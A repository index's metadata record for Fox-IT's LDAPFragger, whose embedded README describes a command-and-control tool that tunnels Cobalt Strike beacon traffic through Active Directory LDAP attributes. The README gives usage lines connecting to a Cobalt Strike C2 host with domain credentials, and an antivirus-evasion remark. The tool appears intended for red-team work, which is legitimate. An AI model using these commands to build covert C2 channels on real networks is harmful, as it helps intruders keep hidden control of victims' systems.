{"id":28486144,"url":"https://github.com/fox-it/ldapfragger","last_synced_at":"2025-10-29T11:01:23.969Z","repository":{"id":54135758,"uuid":"248449889","full_name":"fox-it/LDAPFragger","owner":"fox-it","description":null,"archived":false,"fork":false,"pushed_at":"2020-03-19T10:13:44.000Z","size":75,"stargazers_count":193,"open_issues_count":0,"forks_count":28,"subscribers_count":10,"default_branch":"master","last_synced_at":"2025-07-02T12:48:09.830Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/fox-it.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-03-19T08:32:38.000Z","updated_at":"2025-05-31T23:32:08.000Z","dependencies_parsed_at":"2022-08-13T07:20:20.280Z","dependency_job_id":null,"html_url":"https://github.com/fox-it/LDAPFragger","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/fox-it/LDAPFragger","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/fox-it%2FLDAPFragger","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/fox-it%2FLDAPFragger/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/fox-it%2FLDAPFragger/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/fox-it%2FLDAPFragger/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/fox-it","download_url":"https://codeload.github.com/fox-it/LDAPFragger/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/fox-it%2FLDAPFragger/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":279006454,"owners_count":26084105,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-11T02:00:06.511Z","response_time":55,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-06-08T01:10:22.407Z","updated_at":"2025-10-11T06:08:28.342Z","avatar_url":"https://github.com/fox-it.png","language":"C#","funding_links":[],"categories":[],"sub_categories":[],"readme":"# LDAPFragger\n\nLDAPFragger is a Command and Control tool that enables attackers to route Cobalt Strike beacon data over LDAP using user attributes.\n\nFor background information, read the release blog: http://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes\n\n\n## Dependencies and installation\n* Compiled with `.NET 4.0`, but may work with older and newer .NET frameworks as well\n\n## Usage\n\n```\n _     _              __\n| |   | |            / _|\n| | __| | __ _ _ __ | |_ _ __ __ _  __ _  __ _  ___ _ __\n| |/ _` |/ _` | '_ \\|  _| '__/ _` |/ _` |/ _` |/ _ \\ '__|\n| | (_| | (_| | |_) | | | | | (_| | (_| | (_| |  __/ |\n|_|\\__,_|\\__,_| .__/|_| |_|  \\__,_|\\__, |\\__, |\\___|_|\n              | |                   __/ | __/ |\n              |_|                  |___/ |___/\n\nFox-IT - Rindert Kramer\n\nUsage:\n     --cshost:  IP address or hostname of the Cobalt Strike instance\n     --csport:  Port of the external C2 interface on the Cobalt Strike server\n     -u:        Username to connect to Active Directory\n     -p:        Password to connect to Active Directory\n     -d:        FQDN of the Active Directory domain\n     --ldaps:   Use LDAPS instead of LDAP\n     -v:        Verbose output\n     -h:        Display  this message\n\nIf no AD credentials are provided, integrated AD authentication will be used.\n```\n\nExample usage:\n\n![](https://foxitsecurity.files.wordpress.com/2020/03/9.png?w=607) \n\n\nFrom network segment A, run\n```\nLDAPFragger --cshost \u003cCobalt Strike IP\u003e --csport \u003cExternal listener port\u003e\n\nLDAPFragger --cshost \u003cCobalt Strike IP\u003e --csport \u003cExternal listener port\u003e -u \u003cusername\u003e -p \u003cpassword\u003e -d \u003cdomain FQDN\u003e\n```\n\nFrom network segment B, run\n```\nLDAPFragger \n\nLDAPFragger -u \u003cusername\u003e -p \u003cpassword\u003e -d \u003cdomain FQDN\u003e\n```\n\n\nLDAPS can be used with the `--LDAPS` flag, however, regular LDAP traffic is encrypted as well. Please do note that the default Cobalt Strike payload will get caught by most AVs.\n\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ffox-it%2Fldapfragger","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ffox-it%2Fldapfragger","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ffox-it%2Fldapfragger/lists"}